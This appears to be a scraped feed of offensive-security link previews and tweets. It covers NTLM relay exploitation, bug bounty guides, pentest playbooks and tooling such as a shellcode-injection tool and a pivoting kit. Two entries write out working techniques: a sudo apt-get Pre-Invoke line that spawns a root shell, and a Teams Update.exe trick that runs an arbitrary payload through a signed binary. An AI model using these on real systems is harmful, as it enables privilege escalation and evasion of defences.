Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - dirkjanm.io
https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/
https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/
dirkjanm.io
Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin
Earlier this week, Microsoft issued patches for CVE-2019-1040, which is a vulnerability that allows for bypassing of NTLM relay mitigations. The vulnerability was discovered by Marina Simakov and Yaron Zinar (as well as several others credited in the Microsoft…
Using Nmap to extract Windows host and domain information via RDP | Faded Lab
https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/
https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/
Faded Lab
Using Nmap to extract Windows host and domain information via RDP
I’ve recently spent some time in various code bases working on Windows RDP related discovery. This post is going to talk about using a new Nmap script, rdp-ntlm-info.nse, against RDP services…
Guide 001 | Getting Started in Bug Bounty Hunting..
1.Basics of Networks, Programming & Automation
2.Learning about Vulnerabilities, Resource for practicing, Tools…
3.Selecting a target, starting tests & writing reports
https://t.co/XK5eR2zm8h
1.Basics of Networks, Programming & Automation
2.Learning about Vulnerabilities, Resource for practicing, Tools…
3.Selecting a target, starting tests & writing reports
https://t.co/XK5eR2zm8h
Muhammad Khizer Javed
Guide 001 |Getting Started in Bug Bounty Hunting..
A Noobs Guide to Getting Started in Bug Bounty Hunting | Muhammad Khizer Javed, whoami.securitybreached.org | aslicybersecurity.com | @KHIZER_JAVED47 No one will tell you anything or everything abo…
Linux for Pentester: APT Privilege Escalation
Exploiting Sudo rights: Method -I
sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash https://t.co/iv7saeYsr6
Exploiting Sudo rights: Method -I
sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash https://t.co/iv7saeYsr6
Twitter
김진욱
Linux for Pentester: APT Privilege Escalation Exploiting Sudo rights: Method -I sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash
GitHub - sdcampbell/Internal-Pentest-Playbook: Internal Network Penetration Test Playbook
https://github.com/sdcampbell/Internal-Pentest-Playbook
https://github.com/sdcampbell/Internal-Pentest-Playbook
GitHub
GitHub - sdcampbell/Internal-Pentest-Playbook: Internal Network Penetration Test Playbook
Internal Network Penetration Test Playbook. Contribute to sdcampbell/Internal-Pentest-Playbook development by creating an account on GitHub.
GitHub - emadshanab/WordLists-20111129: A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose.
https://github.com/emadshanab/WordLists-20111129
https://github.com/emadshanab/WordLists-20111129
GitHub
GitHub - emadshanab/WordLists-20111129: A lists of words based on common web directory and file names lists of words based on common…
A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose. - emadshanab/WordLis...
GitHub - dukebarman/ghidra-builder: Docker image for building ghidra RE framework from source
https://github.com/dukebarman/ghidra-builder
https://github.com/dukebarman/ghidra-builder
GitHub
GitHub - dukebarman/ghidra-builder: Docker image for building ghidra RE framework from source
Docker image for building ghidra RE framework from source - dukebarman/ghidra-builder
The Return of the WIZard: RCE in Exim - GlitchWitch.IO
https://glitchwitch.io/blog/2019-06/exploiting-cve-2019-10149/
https://glitchwitch.io/blog/2019-06/exploiting-cve-2019-10149/
How to Upgrade Your XSS Bug from Medium to Critical
https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
Medium
How to Upgrade Your XSS Bugs from Medium to Critical
Some ways to effectively leverage XSS vulnerabilities to increase severity, and some canned payloads to hack popular frameworks!
Magic Unicorn 3.8.1 released.
Adds new method for platform detection, obfuscation, and a fix for python2 raw_input when using AMSI bypass.
https://t.co/YeXwYojd5l
Adds new method for platform detection, obfuscation, and a fix for python2 raw_input when using AMSI bypass.
https://t.co/YeXwYojd5l
GitHub
trustedsec/unicorn
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique...
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\
Then
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"
Trusted signed binary will run the payload for you 😊
Then
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"
Trusted signed binary will run the payload for you 😊
Android-Reports-and-Resources/README.md at master · B3nac/Android-Reports-and-Resources · GitHub
https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md
https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md
GitHub
Android-Reports-and-Resources/README.md at master · B3nac/Android-Reports-and-Resources
A big list of Android Hackerone disclosed reports and other resources. - B3nac/Android-Reports-and-Resources
Finding and Testing MisConfigured S3 Buckets ! - Rohan Chavan - Medium
https://medium.com/@rohanchavan/finding-and-testing-misconfigured-s3-buckets-d77992c4b5cd
https://medium.com/@rohanchavan/finding-and-testing-misconfigured-s3-buckets-d77992c4b5cd
Medium
Finding and Testing MisConfigured S3 Buckets.
An guide to find misconfigured s3 buckets for #BugBounty.
GitHub - securityidiots/CollabOzark: CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE, External Resource Access payloads triggers.
https://github.com/securityidiots/CollabOzark
https://github.com/securityidiots/CollabOzark
GitHub
GitHub - securityidiots/CollabOzark: CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE,…
CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE, External Resource Access payloads triggers. - GitHub - securityidiots/CollabOzark: CollabOzark is a simple ...
GitHub - RedTeamOperations/PivotSuite: Network Pivoting Toolkit
https://github.com/RedTeamOperations/PivotSuite
https://github.com/RedTeamOperations/PivotSuite
GitHub
GitHub - RedTeamOperations/PivotSuite: Network Pivoting Toolkit
Network Pivoting Toolkit. Contribute to RedTeamOperations/PivotSuite development by creating an account on GitHub.